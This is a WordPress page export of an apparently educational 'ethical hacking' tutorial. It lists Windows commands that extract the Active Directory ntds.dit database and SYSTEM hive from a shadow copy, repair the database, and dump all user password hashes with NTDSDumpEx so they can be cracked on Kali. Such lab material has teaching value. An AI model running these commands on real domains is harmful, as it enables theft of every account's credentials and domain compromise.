{"id":343,"date":"2024-05-20T14:04:34","date_gmt":"2024-05-20T14:04:34","guid":{"rendered":"https:\/\/people.utm.my\/abdulghafar\/?page_id=343"},"modified":"2025-04-18T01:27:36","modified_gmt":"2025-04-18T01:27:36","slug":"crack-microsoft-active-directory-user-password-with-ntdsdumpex","status":"publish","type":"page","link":"https:\/\/people.utm.my\/abdulghafar\/crack-microsoft-active-directory-user-password-with-ntdsdumpex\/","title":{"rendered":"Ethical Hacking 4: Cracking Active Directory User Password"},"content":{"rendered":"\n<p><strong>Disclaimer: <\/strong><strong>This article is suitable for intermediate and expert users and only for education.<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>copy NTDS database using the following command: <strong>copy \\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\ntds\\ntds.dit \u00a0c:\\Extract\\ntds.dit<\/strong><\/li>\n\n\n\n<li>copy SYS using the following command: reg SAVE HKLM\\SYSTEM c:\\Extract\\SYS<\/li>\n\n\n\n<li>Copy System using the following command: <strong>\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\SYSTEM c:\\Extract\\SYSTEM<\/strong><\/li>\n\n\n\n<li>Gain the decrypted password using the following command: <strong>NTDSDumpEx.exe -d C:\\Extract\\ntds.dit -s C:\\Extract\\SYSTEM<\/strong><\/li>\n<\/ol>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"133\" src=\"https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture-1024x133.jpg\" alt=\"\" class=\"wp-image-346\" srcset=\"https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture-1024x133.jpg 1024w, https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture-300x39.jpg 300w, https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture-768x100.jpg 768w, https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture.jpg 1252w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-left\"> <strong>Note<\/strong>: The process failed, and the error indicates that the database needs to be repaired.<\/p>\n\n\n\n<p>        5. Repair NTDS using the following command: <strong>ESENTUTL \/p C:\\Extract\\ntds.dit \/!10240\/08 \/o<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"495\" height=\"566\" src=\"https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture1-1.jpg\" alt=\"\" class=\"wp-image-361\" srcset=\"https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture1-1.jpg 495w, https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture1-1-262x300.jpg 262w\" sizes=\"auto, (max-width: 495px) 100vw, 495px\" \/><\/figure>\n\n\n\n<p>6. Re-execute the following command: <strong>NTDSDumpEx.exe -d C:\\Extract\\ntds.dit -s C:\\Extract\\SYSTEM<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"726\" height=\"261\" src=\"https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture2.jpg\" alt=\"\" class=\"wp-image-352\" srcset=\"https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture2.jpg 726w, https:\/\/people.utm.my\/abdulghafar\/wp-content\/uploads\/sites\/3106\/2024\/05\/Capture2-300x108.jpg 300w\" sizes=\"auto, (max-width: 726px) 100vw, 726px\" \/><\/figure>\n\n\n\n<ol class=\"wp-block-list\" style=\"list-style-type:lower-alpha\">\n<li>All users and hash passwords are listed.<\/li>\n\n\n\n<li>Three users (Administrator, far and mike) share the same hash, which indicates that the users utilize the same password. This loophole gives the hacker a clue that all users will utilize the same password.<\/li>\n\n\n\n<li>Copy the hash value into Notepad, save it as .txt, and transfer it to the Kali Linux Virtual Machine.<\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"<p>Disclaimer: This article is suitable for intermediate and expert users and only for education. Note: The process failed, and the error indicates that the database needs to be repaired. 5. Repair NTDS using the following command: ESENTUTL \/p C:\\Extract\\ntds.dit \/!10240\/08 \/o 6. Re-execute the following command: NTDSDumpEx.exe -d C:\\Extract\\ntds.dit -s C:\\Extract\\SYSTEM<\/p>\n","protected":false},"author":25922,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-343","page","type-page","status-publish","hentry","entry"],"_links":{"self":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages\/343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/users\/25922"}],"replies":[{"embeddable":true,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/comments?post=343"}],"version-history":[{"count":19,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages\/343\/revisions"}],"predecessor-version":[{"id":380,"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/pages\/343\/revisions\/380"}],"wp:attachment":[{"href":"https:\/\/people.utm.my\/abdulghafar\/wp-json\/wp\/v2\/media?parent=343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}